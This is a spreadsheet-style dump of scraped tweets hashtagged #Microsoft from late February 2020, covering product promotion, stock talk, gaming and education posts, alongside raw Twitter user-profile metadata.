    <t>{'id': 18789056, 'id_str': '18789056', 'name': 'Matthew Dressman', 'screen_name': 'mdressman', 'location': 'Seattle, WA', 'description': 'Engineering Manager building security workflow systems at @Microsoft @msftsecresponse, Grunge fan, JavaScript enthusiast, Seinfeld academic', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 1371, 'friends_count': 900, 'listed_count': 67, 'created_at': 'Fri Jan 09 02:31:49 +0000 2009', 'favourites_count': 6694, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 7298,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'http://pbs.twimg.com/profile_images/1157513766944116736/o2Tcvhjr_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1157513766944116736/o2Tcvhjr_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/18789056/1537591706', 'profile_link_color': '002182', 'profile_sidebar_border_color': 'FFFFFF', 'profile_sidebar_fill_color': 'FFFFFF', 'profile_text_color': '2C2C2C', 'profile_use_background_image': True, 'has_extended_profile': False, 'default_profile': False, 'default_profile_image': False, 'following': None, 'follow_request_sent': None, 'notifications': None, 'translator_type': 'none'}</t>
  </si>
  <si>
    <t>Wed Feb 26 04:27:17 +0000 2020</t>
  </si>
  <si>
    <t>Hello? #retrolife #90s #phone #apple #samsung #retrogamer #microsoft #hello https://t.co/QcErzyj0oz</t>
  </si>
  <si>
    <t>{'id': 200768559, 'id_str': '200768559', 'name': 'Daniel Andrade', 'screen_name': 'dandrade85', 'location': 'Orlando, FL', 'description': 'Enjoying  the life is the most important stuff in our lives !!', 'url': 'https://t.co/zXSvBD0OCK', 'entities': {'url': {'urls': [{'url': 'https://t.co/zXSvBD0OCK', 'expanded_url': 'http://www.ofi-store.com', 'display_url': 'ofi-store.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 72, 'friends_count': 84, 'listed_count': 1, 'created_at': 'Sun Oct 10 05:44:23 +0000 2010', 'favourites_count': 76, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 142,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'http://pbs.twimg.com/profile_images/1232554770608594944/GoCTSu9g_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1232554770608594944/GoCTSu9g_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/200768559/1538344447', 'profile_link_color': 'B30083', 'profile_sidebar_border_color': '2D8CE0', 'profile_sidebar_fill_color': 'FFC175', 'profile_text_color': '333333', 'profile_use_background_image': True, 'has_extended_profile': True, 'default_profile': False, 'default_profile_image': False, 'following': None, 'follow_request_sent': None, 'notifications': None, 'translator_type': 'none'}</t>
  </si>
  <si>
    <t>Wed Feb 26 04:27:15 +0000 2020</t>
  </si>
  <si>
    <t>Component Library with React and Bit
#programming #programmer #developer #coding #nodejs #code  #dev #development #python #sql #html5 #mysql #css3 #javascript #js #tech #react #github #git #microsoft #vuejs #redux #docker #frontend #backend https://t.co/bR5yhqFoJS</t>
  </si>
  <si>
    <t>Wed Feb 26 04:23:02 +0000 2020</t>
  </si>
  <si>
    <t>Imagine if they kept spawning there though..  #halo #haloce #haloceanniversary #halo2 #halo2anniversary #halo3 #halo4 #halo5 #haloinfinite #haloreach #haloodst #halomcc #microsoft #bungie #343 #xboxone #gamer
https://t.co/X6icZeOKTs</t>
  </si>
  <si>
    <t>Wed Feb 26 04:18:50 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft is on this year's #Blockchain50 list. The #software giant offers blockchain-as-a-service through Azure, its cloud computing arm https://t.co/Ar7T7GROHH https://t.co/weKQUY3mpl</t>
  </si>
  <si>
    <t>{'id': 263128112, 'id_str': '263128112', 'name': 'Business Finance &amp; Markets', 'screen_name': 'equityin', 'location': ' ðŸ‡ºðŸ‡¸ðŸ‡¯ðŸ‡µðŸ‡ªðŸ‡ºðŸ‡¬ðŸ‡§ ðŸ‡®ðŸ‡³ ðŸ‡©ðŸ‡ª ', 'description': 'Equityin &amp; Coâ„¢ \nThe Investorâ€™s Choice |\nTrust - Value - Solutions \n#Equity #Stocks #Currency #Commodity #BRICS\nequityinin@gmail.com', 'url': 'https://t.co/fE4V7TRrIK', 'entities': {'url': {'urls': [{'url': 'https://t.co/fE4V7TRrIK', 'expanded_url': 'https://www.twitter.com/equityin', 'display_url': 'twitter.com/equityin', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 1801, 'friends_count': 4349, 'listed_count': 87, 'created_at': 'Wed Mar 09 12:52:01 +0000 2011', 'favourites_count': 16172, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 55893,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'http://pbs.twimg.com/profile_images/1224601263846776834/rEGtYUNU_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1224601263846776834/rEGtYUNU_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/263128112/1580620737',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</si>
  <si>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Wed Feb 26 04:14:16 +0000 2020</t>
  </si>
  <si>
    <t>Software is malleable, use it to create growth: Satya Nadella
Courtesy:- Economic times
 #microsoft #technology #innovation #innovativesolutions #satyanadella https://t.co/JVBy7gGjLC</t>
  </si>
  <si>
    <t>{'id': 2855337030, 'id_str': '2855337030', 'name': 'madhurendra kumar', 'screen_name': 'madhurendraa', 'location': '', 'description': 'BDE in Software Marketing at Technotechindia\n.', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 7, 'friends_count': 141, 'listed_count': 0, 'created_at': 'Tue Oct 14 09:38:22 +0000 2014', 'favourites_count': 298, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 232,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'http://pbs.twimg.com/profile_images/1173868939518074882/u37Ukzev_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1173868939518074882/u37Ukzev_normal.jpg',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</si>
  <si>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04:14:06 +0000 2020</t>
  </si>
  <si>
    <t>Check out Lot of 5 Original Xbox 360 Consoles As Is Parts &amp;amp; Repair Only Lot 1 #Microsoft #SModels https://t.co/iXS7I1oR2t via @eBay</t>
  </si>
  <si>
    <t>Wed Feb 26 04:11:02 +0000 2020</t>
  </si>
  <si>
    <t>Cant wait to be in #Boston meeting with my strategic Partners #TylerBowman #cloudexpert #microsoftcsp #velosio #stratoscloud #microsoft #leader #entrepreneur #PDM</t>
  </si>
  <si>
    <t>{'id': 4175301945, 'id_str': '4175301945', 'name': 'Tyler James Bowman', 'screen_name': 'TB_StratosCloud', 'location': 'New Jersey, USA', 'description': 'Director of Cloud Solutions &amp; PDM for Velosio| SCA. Rutgers Design Thinking Advisory Board Member and Forbes Business Development Council. IAMCP NJ Board Member', 'url': 'https://t.co/Y7LQXZfEMt', 'entities': {'url': {'urls': [{'url': 'https://t.co/Y7LQXZfEMt', 'expanded_url': 'https://linktr.ee/tb_stratoscloud', 'display_url': 'linktr.ee/tb_stratoscloud', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 79, 'friends_count': 128, 'listed_count': 1, 'created_at': 'Fri Nov 13 01:18:39 +0000 2015', 'favourites_count': 18, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 106,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'http://pbs.twimg.com/profile_images/1126507285973426177/pSdVAxoM_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1126507285973426177/pSdVAxoM_normal.png', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/4175301945/1582125636',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</si>
  <si>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04:10:04 +0000 2020</t>
  </si>
  <si>
    <t>Top 5 IoT Messaging Protocols
 #AMQP #AzureIoTHub #CoAP #Microsoft #Build5Nines
https://t.co/sHKuMp4nDQ</t>
  </si>
  <si>
    <t>Wed Feb 26 04:04:18 +0000 2020</t>
  </si>
  <si>
    <t>In a simulated phishing attack, over 10% of recipients clicked on a "nefarious" link. Younger students are often easier targets for phishing attacks, putting entire universities at risk. #Microsoft can help protect them. https://t.co/dMHCTbLXRi</t>
  </si>
  <si>
    <t>Wed Feb 26 04:02:32 +0000 2020</t>
  </si>
  <si>
    <t>Asia Pacific discover from #Microsoft &amp;amp; Board how you can foster digital transformation towards the new #budgeting &amp;amp; #planning frontier, with the advantages of cloud. https://t.co/ubKyVyvz0k https://t.co/agohtsQcqv</t>
  </si>
  <si>
    <t>{'id': 156706049, 'id_str': '156706049', 'name': 'Board International', 'screen_name': 'BoardSoftware', 'location': 'Switzerland', 'description': 'Board International is a global provider of unified #BI #CPM and #PredictiveAnalytics software. Follow us also on https://t.co/Csu6j5ROP4', 'url': None, 'entities': {'description': {'urls': [{'url': 'https://t.co/Csu6j5ROP4', 'expanded_url': 'http://linkd.in/1v9oBW1', 'display_url': 'linkd.in/1v9oBW1', 'indices': [114, 137]}]}}, 'protected': False, 'followers_count': 18814, 'friends_count': 1033, 'listed_count': 156, 'created_at': 'Thu Jun 17 17:40:30 +0000 2010', 'favourites_count': 720, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 2726,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'http://pbs.twimg.com/profile_images/1126025689747066880/FBZOtmHT_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1126025689747066880/FBZOtmHT_normal.png', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/156706049/1557300421', 'profile_link_color': '004288', 'profile_sidebar_border_color': 'FFFFFF', 'profile_sidebar_fill_color': '9BCAEB', 'profile_text_color': '000000', 'profile_use_background_image': True, 'has_extended_profile': False, 'default_profile': False, 'default_profile_image': False, 'following': None, 'follow_request_sent': None, 'notifications': None, 'translator_type': 'none'}</t>
  </si>
  <si>
    <t>Wed Feb 26 04:01:15 +0000 2020</t>
  </si>
  <si>
    <t>Unique slide design experience for your presentation
https://t.co/TXFziMfbT2
#powerpoint
#Microsoft #ms #presentation #tell #story #slide #design
 #pages #business #ppt #pptx #animation #designer #creative #minimal #cover #title #master #tomorrow #present #speaker #social #ux https://t.co/huLzfH0tL9</t>
  </si>
  <si>
    <t>Wed Feb 26 04:00:00 +0000 2020</t>
  </si>
  <si>
    <t>#FirstEagle Investment #fund largest sales of #Q42019, #Microsoft Corp. $MSFT https://t.co/V1pJGnOi2J</t>
  </si>
  <si>
    <t>{'id': 3010817206, 'id_str': '3010817206', 'name': 'TheExtraIncome', 'screen_name': 'TheExtraIncome', 'location': 'Italy', 'description': 'Charts and comments are for entertainment and educational purposes only. For Trading Advice, seek out a professional. #hedgefund #stocks #trading #stockmarket', 'url': 'http://t.co/DQtzXY1HYx', 'entities': {'url': {'urls': [{'url': 'http://t.co/DQtzXY1HYx', 'expanded_url': 'http://www.theextraincome.info', 'display_url': 'theextraincome.info', 'indices': [0, 22]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 30802, 'friends_count': 1637, 'listed_count': 150, 'created_at': 'Sun Feb 01 19:34:30 +0000 2015', 'favourites_count': 1058, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 29974,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'http://pbs.twimg.com/profile_images/897549803739127809/khD-KvEr_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/897549803739127809/khD-KvEr_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/3010817206/1422873172', 'profile_link_color': '4A913C',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</si>
  <si>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Wed Feb 26 03:53:25 +0000 2020</t>
  </si>
  <si>
    <t>Empower your teams to make critical business decisions using up-to-the-minute analytics with #Microsoft #PowerBI. https://t.co/fjw3rj90xR
#MicrosoftDynamics #MicrosoftPartner #DynamicsPartner #DynamicsSquare https://t.co/MUbTAzAxel</t>
  </si>
  <si>
    <t>{'id': 724889128148582401, 'id_str': '724889128148582401', 'name': 'Dynamics Square', 'screen_name': 'dynamicssquare', 'location': 'Australia', 'description': 'Leading Microsoft Dynamics Partner specialized in Microsoft Dynamics 365, NAV, AX, CRM, SharePoint and Power BI.', 'url': 'https://t.co/alc2e46gro', 'entities': {'url': {'urls': [{'url': 'https://t.co/alc2e46gro', 'expanded_url': 'https://www.dynamicssquare.com.au', 'display_url': 'dynamicssquare.com.au', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 49, 'friends_count': 10, 'listed_count': 1, 'created_at': 'Tue Apr 26 09:13:30 +0000 2016', 'favourites_count': 1, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 300, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/956399369892147200/t3MR1NDn_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/956399369892147200/t3MR1NDn_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/724889128148582401/1516859453',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</si>
  <si>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03:39:53 +0000 2020</t>
  </si>
  <si>
    <t>Office Space 2018 edition #Microsoft
https://t.co/cz1ORyQXbp https://t.co/l2OAKxqU2w</t>
  </si>
  <si>
    <t>{'id': 124954244, 'id_str': '124954244', 'name': 'SQL+++', 'screen_name': 'sqliam', 'location': 'Woodinville,WA', 'description': 'opinions are provided AS IT IS with no warranties, express or implied, and I hereby disclaim all implied warranties or liabilities associated with them', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 339, 'friends_count': 298, 'listed_count': 40, 'created_at': 'Sun Mar 21 04:55:16 +0000 2010', 'favourites_count': 673, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 1507,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'http://pbs.twimg.com/profile_images/1172625021329661953/7cn1tqLA_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1172625021329661953/7cn1tqLA_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/124954244/1483586654',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</si>
  <si>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03:38:47 +0000 2020</t>
  </si>
  <si>
    <t>A huge paradigm shift in the field of #IOT
#microsoft #CloudComputing
#azure
https://t.co/QwxQNFlucF</t>
  </si>
  <si>
    <t>{'id': 1699728762, 'id_str': '1699728762', 'name': 'Mustafa Saifee', 'screen_name': 'immustu', 'location': 'Pune, Maharashtra', 'description': 'ðŸ… Gold Microsoft Student Partner \t: : Microsoft Azure â˜ï¸', 'url': 'https://t.co/dtEOHVxCE9', 'entities': {'url': {'urls': [{'url': 'https://t.co/dtEOHVxCE9', 'expanded_url': 'https://www.saifeemustafa.com/', 'display_url': 'saifeemustafa.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 112, 'friends_count': 244, 'listed_count': 2, 'created_at': 'Sun Aug 25 17:44:12 +0000 2013', 'favourites_count': 434, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 104,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'http://pbs.twimg.com/profile_images/1222951317145972736/6KPVwGMN_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1222951317145972736/6KPVwGMN_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1699728762/1443364952',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</si>
  <si>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03:38:22 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft Teams can help your #business stay organized and connected. Not convinced? Listen to our TechTalk about it. https://t.co/GIa1VdWutB #tech</t>
  </si>
  <si>
    <t>Wed Feb 26 03:36:00 +0000 2020</t>
  </si>
  <si>
    <t>Doing my best geraldem impression. #hockey #Microsoft #workflow @ Anaheim Ducks https://t.co/kREyPVX31q</t>
  </si>
  <si>
    <t>Wed Feb 26 03:33:42 +0000 2020</t>
  </si>
  <si>
    <t>Udemy Free Discount - SQL &amp;amp; Database Design A-ZTM: Learn MS SQL Server + PostgreSQL #udemycoupon -&amp;gt; https://t.co/x0AldXAG3X
#DataScience #MachineLearning #Python #DataAnalysis #DeepLearning #SQL #ArtificialIntelligence #Microsoft #PowerBI #Tableau #BigData #hadoop #100DaysOfCode</t>
  </si>
  <si>
    <t>Wed Feb 26 03:29:33 +0000 2020</t>
  </si>
  <si>
    <t>really climbing today @RobinhoodSnacks @RobinhoodApp @AskRobinhood @BreakoutStocks @StocksToTrade #stocks #robinhood #cashmanagement #robinhoodcashmanagement #stockstowatch #StocksToTrade #nvidia #tesla #microsoft #nokia #wayfair https://t.co/5Zx9KkqQy4</t>
  </si>
  <si>
    <t>{'id': 1126876293243400192, 'id_str': '1126876293243400192', 'name': '3ARZ STOCK PICKZ 2020', 'screen_name': 'earzstockpickz', 'location': 'Japan', 'description': '18+ start investing with robinhood using my link and earn your first $5-$100 stock for free ðŸ’°', 'url': 'https://t.co/zQ0uaGZXAv', 'entities': {'url': {'urls': [{'url': 'https://t.co/zQ0uaGZXAv', 'expanded_url': 'https://join.robinhood.com/logans932', 'display_url': 'join.robinhood.com/logans932', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 24, 'friends_count': 122, 'listed_count': 0, 'created_at': 'Fri May 10 15:46:59 +0000 2019', 'favourites_count': 63,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'http://pbs.twimg.com/profile_images/1234598382150119425/YjdFFX4g_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1234598382150119425/YjdFFX4g_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1126876293243400192/1582326118',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</si>
  <si>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03:18:15 +0000 2020</t>
  </si>
  <si>
    <t>Some things are cool online only. But local accounts are 100% necessary for anyone who remotely cares about their personal data and privacy.
#InfoSec #Security #Microsoft  https://t.co/aSeUyVxXet</t>
  </si>
  <si>
    <t>Wed Feb 26 03:10:45 +0000 2020</t>
  </si>
  <si>
    <t>22 Rules for Designing Sign-Up &amp;amp; Sign-In Journeys  https://t.co/COiwwV3yaV
#100DaysOfCode #Programming #301DaysOfCode #Linux #Microsoft #Mobile #CSS #HTML #API #Mozilla #Firefox #Android #iOS #web #Angular #NodeJS #VueJS #JavaScript</t>
  </si>
  <si>
    <t>Wed Feb 26 03:04:57 +0000 2020</t>
  </si>
  <si>
    <t>All the Best Dear Team!
#KamlaNehruPublicSchool
Microsoft AI for Good Challenge #NationalWinners presenting to #Microsoft #CEO @satyanadella @charuchhabra2 @ashokkp @banaqvi @MeenakshiUberoi @nishajassal7 @shardapullabha2 @nevineasfour @MonikaSawhney6 @AboutImpact https://t.co/g9LW40DmmM</t>
  </si>
  <si>
    <t>Wed Feb 26 03:02:57 +0000 2020</t>
  </si>
  <si>
    <t>We've got your back! Get help putting #technology in your school through #Microsoft's online tools. Select, deploy, and learn-it's easy as 1-2-3!     #EducationalTechnology #K12 #MicrosoftEducation #Windows10 https://t.co/xWfIPPXlyJ</t>
  </si>
  <si>
    <t>Wed Feb 26 03:00:37 +0000 2020</t>
  </si>
  <si>
    <t>Avanade offers #Microsoft #Dynamics AX Development Services covering Mobile Apps, Integraions, ERP and CRM --&amp;gt; https://t.co/NCQlRwXE4o &amp;lt;-- February 25, 2020 at 10:00PM</t>
  </si>
  <si>
    <t>Wed Feb 26 02:55:40 +0000 2020</t>
  </si>
  <si>
    <t>Wed Feb 26 02:55:39 +0000 2020</t>
  </si>
  <si>
    <t>Innovating to drive the future of intelligent retail
#The Official Microsoft Blog #Microsoft
https://t.co/BUWhwn8Mqo</t>
  </si>
  <si>
    <t>Wed Feb 26 02:55:36 +0000 2020</t>
  </si>
  <si>
    <t>From tech adoption to tech creation: Customers across industries are using advanced cloud and AI tools to build their own digital solutions
#PowerApps #Microsoft
https://t.co/6SJe2eLBby</t>
  </si>
  <si>
    <t>From tech adoption to tech creation: Customers across industries are using advanced cloud and AI tools to build their own digital solutions
#Power BI #Microsoft
https://t.co/6SJe2eLBby</t>
  </si>
  <si>
    <t>Wed Feb 26 02:55:35 +0000 2020</t>
  </si>
  <si>
    <t>Wed Feb 26 02:55:34 +0000 2020</t>
  </si>
  <si>
    <t>Wed Feb 26 02:55:33 +0000 2020</t>
  </si>
  <si>
    <t>Wed Feb 26 02:55:32 +0000 2020</t>
  </si>
  <si>
    <t>Wed Feb 26 02:55:31 +0000 2020</t>
  </si>
  <si>
    <t>Wed Feb 26 02:55:30 +0000 2020</t>
  </si>
  <si>
    <t>Wed Feb 26 02:55:26 +0000 2020</t>
  </si>
  <si>
    <t>Wed Feb 26 02:55:25 +0000 2020</t>
  </si>
  <si>
    <t>U.S. Air Force and Microsoft partner to empower airmen with modern IT
#Microsoft 365 Government #Microsoft
https://t.co/hFpf45JkH0</t>
  </si>
  <si>
    <t>Wed Feb 26 02:55:23 +0000 2020</t>
  </si>
  <si>
    <t>Wed Feb 26 02:55:22 +0000 2020</t>
  </si>
  <si>
    <t>Wed Feb 26 02:55:21 +0000 2020</t>
  </si>
  <si>
    <t>Wed Feb 26 02:55:20 +0000 2020</t>
  </si>
  <si>
    <t>Wed Feb 26 02:55:19 +0000 2020</t>
  </si>
  <si>
    <t>Wed Feb 26 02:55:18 +0000 2020</t>
  </si>
  <si>
    <t>Wed Feb 26 02:55:16 +0000 2020</t>
  </si>
  <si>
    <t>Wed Feb 26 02:55:15 +0000 2020</t>
  </si>
  <si>
    <t>Wed Feb 26 02:50:58 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft Windows revenue could see #coronavirus slowdown as PC makers struggle to meet demand https://t.co/agmLyCoaIp</t>
  </si>
  <si>
    <t>{'id': 75980005, 'id_str': '75980005', 'name': 'B2BManufactures.com', 'screen_name': 'b2bmanufactures', 'location': 'Taiwan', 'description': 'The most comprehensive Manufacturers Directory from Taiwan and China that you can fully trust.', 'url': 'https://t.co/bNyNqasSBW', 'entities': {'url': {'urls': [{'url': 'https://t.co/bNyNqasSBW', 'expanded_url': 'http://B2BManufactures.com', 'display_url': 'B2BManufactures.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 126, 'friends_count': 206, 'listed_count': 50, 'created_at': 'Mon Sep 21 07:33:38 +0000 2009', 'favourites_count': 11, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 4784,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True, 'profile_image_url': 'http://pbs.twimg.com/profile_images/984615315353907200/1J1zlBoK_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/984615315353907200/1J1zlBoK_normal.jpg', 'profile_link_color': '0033FF',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</si>
  <si>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Wed Feb 26 02:48:01 +0000 2020</t>
  </si>
  <si>
    <t>Airport security officer-turned-developer helps Heathrow book a faster journey to #DigitalTransformation with #Microsoft #PowerPlatform. Watch the video. https://t.co/bHDRBb3v5b</t>
  </si>
  <si>
    <t>Wed Feb 26 02:34:20 +0000 2020</t>
  </si>
  <si>
    <t>We've got your back! Get help putting #technology in your school through #Microsoft's online tools. Select, deploy, and learn-it's easy as 1-2-3!     #EducationalTechnology #K12 #MicrosoftEducation #Windows10 https://t.co/gpWOaU8pJF</t>
  </si>
  <si>
    <t>Wed Feb 26 02:31:41 +0000 2020</t>
  </si>
  <si>
    <t>Check out how Kelly Roofing achieved a 508% ROI and 2.4-month payback period on their successful #MSDyn365 Business Central implementation!      #Microsoft #Technology #IT #BusinessAutomation https://t.co/2LX7FiKYhf</t>
  </si>
  <si>
    <t>Wed Feb 26 02:31:24 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft Intelligent Security Association partnership program now counts new #IoT security vendors @attivonetworks @CyberMDX @cyberx_labs @FiredomeIoT @SecuriThings https://t.co/e9cR5QPObU #MSIoT</t>
  </si>
  <si>
    <t>Wed Feb 26 02:28:42 +0000 2020</t>
  </si>
  <si>
    <t>In the play pen tonight with a Windows 10 Insider build.....Fido 2 with hybrid.. be afraid  @SteveSyfuhs and @NerdPyle 
Anyone going to @CircleCityCon interested in seeing this stuff? This is some of what I'll be submitting in... 
#Passwordless #FIDO2 #infsec #microsoft https://t.co/pMxrexb4ti</t>
  </si>
  <si>
    <t>{'id': 35508508, 'id_str': '35508508', 'name': 'Root', 'screen_name': 'rootsecdev', 'location': '', 'description': 'My thoughts are my own..unless hacked. Then things may get weird.', 'url': 'https://t.co/4TaNvLkJsN', 'entities': {'url': {'urls': [{'url': 'https://t.co/4TaNvLkJsN', 'expanded_url': 'https://github.com/rootsecdev/Microsoft-Blue-Forest', 'display_url': 'github.com/rootsecdev/Micâ€¦', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 5630, 'friends_count': 965, 'listed_count': 200, 'created_at': 'Sun Apr 26 17:07:09 +0000 2009', 'favourites_count': 11472, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 10026,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'http://pbs.twimg.com/profile_images/1226006348711723008/BuSqFZcz_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1226006348711723008/BuSqFZcz_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/35508508/1553685422',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</si>
  <si>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Wed Feb 26 02:28:00 +0000 2020</t>
  </si>
  <si>
    <t>ICYMI: #Microsoft offers a bit of a preview to the #XboxSeriesX, but doesn't give away everything. #Xbox https://t.co/9iSmwgdUa0</t>
  </si>
  <si>
    <t>Wed Feb 26 02:24:07 +0000 2020</t>
  </si>
  <si>
    <t>I love dictate on Microsoft word! I am tired of typing and my ideas flow better when I talk. I press a button and write away! This is 1 of the tools that we cover in our Designated Supports and Assistive Technology training. Imagine what our students could do with it! #Microsoft https://t.co/SjzwZfJpEi</t>
  </si>
  <si>
    <t>{'id': 319130997, 'id_str': '319130997', 'name': 'Brenda I de la Garza', 'screen_name': 'BrendaBilDiagTX', 'location': 'Harlingen, TX', 'description': 'Region One Special Education Coordinator and Regional Testing Coordinator, Diagnostician, future #Doctor in Education, #bilingual #wife #mom #itworksgirl', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 188, 'friends_count': 390, 'listed_count': 2, 'created_at': 'Fri Jun 17 16:17:52 +0000 2011', 'favourites_count': 145, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 440,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'http://pbs.twimg.com/profile_images/1125960681801560064/_1IPZ-Q1_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1125960681801560064/_1IPZ-Q1_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/319130997/1553599691',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</si>
  <si>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02:17:19 +0000 2020</t>
  </si>
  <si>
    <t>Getting started with FSLogix profile containers on Azure Files in Windows Virtual Desktop https://t.co/5vgpOYQ38M #Microsoft</t>
  </si>
  <si>
    <t>Wed Feb 26 02:09:34 +0000 2020</t>
  </si>
  <si>
    <t>Learn about one of the many advantages of having an educational email (.edu). 
https://t.co/H6Hz1jBebZ
#msftstudentpartner #MICROSOFT #visualstudio</t>
  </si>
  <si>
    <t>{'id': 2546963438, 'id_str': '2546963438', 'name': 'Anthony Quiranza', 'screen_name': 'AnthonyQ_EC', 'location': 'Ecuador', 'description': '#MSFTStudentPartner \nEstudiante de IngenierÃ­a en Ciencias de la ComputaciÃ³n de la UPEC\nUPEC Microsoft Community Leader', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 13, 'friends_count': 100, 'listed_count': 2, 'created_at': 'Wed Jun 04 22:58:42 +0000 2014', 'favourites_count': 43, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 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'http://pbs.twimg.com/profile_images/1217850515297636352/8d6-APMT_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1217850515297636352/8d6-APMT_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/2546963438/1579193166',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</si>
  <si>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Wed Feb 26 02:07:56 +0000 2020</t>
  </si>
  <si>
    <t>CTRL + SHIFT + L - Turn on/off @MSExcel column filters.
#TuesdayShortcuts #MSExcel #Excel #ExcelShortcuts #Shortcuts #ShortcutKeys #MicrosoftExcel #SpreadsheetSecrets #ExcelTips #ExcelTricks #Tips #Tricks #Microsoft #HowTos
#ExcelStrategies https://t.co/1btBaBnAo3</t>
  </si>
  <si>
    <t>{'id': 1929290700, 'id_str': '1929290700', 'name': 'Excel Strategies LLC', 'screen_name': 'ExcelStrategies', 'location': 'USA', 'description': 'Excel Strategies, LLC is a full-service, turn-key solution provider for all of your small business needs!', 'url': 'http://t.co/0yzjbzoMJu', 'entities': {'url': {'urls': [{'url': 'http://t.co/0yzjbzoMJu', 'expanded_url': 'http://www.Blog.ExcelStrategiesLLC.com', 'display_url': 'Blog.ExcelStrategiesLLC.com', 'indices': [0, 22]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 2538, 'friends_count': 1727, 'listed_count': 376, 'created_at': 'Thu Oct 03 04:36:18 +0000 2013', 'favourites_count': 66, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 2413,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'http://pbs.twimg.com/profile_images/443964035449372672/8MF1OR4e_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/443964035449372672/8MF1OR4e_normal.png', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1929290700/1421102210',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</si>
  <si>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02:04:24 +0000 2020</t>
  </si>
  <si>
    <t>Lets go!! Apex Legends Grind! Join the Master Domain at:  
https://t.co/8FeboBKTEw
#Mixer #MasterDomain #ApexLegends #Respawn #EA #XBOX #Microsoft</t>
  </si>
  <si>
    <t>Wed Feb 26 02:03:07 +0000 2020</t>
  </si>
  <si>
    <t>Teddy Tedd (Awesome 2) At [R]Evolution of Hip Hop, Universal Hip Hop Museum #bookawesome2andfriends #uhhm #uhhmuseum #legends #legendaryradioshow #legendarydjs #bronxterminalmarket #microsoft give at https://t.co/PxPZ0iWqX4... https://t.co/XnFMfrAVL6</t>
  </si>
  <si>
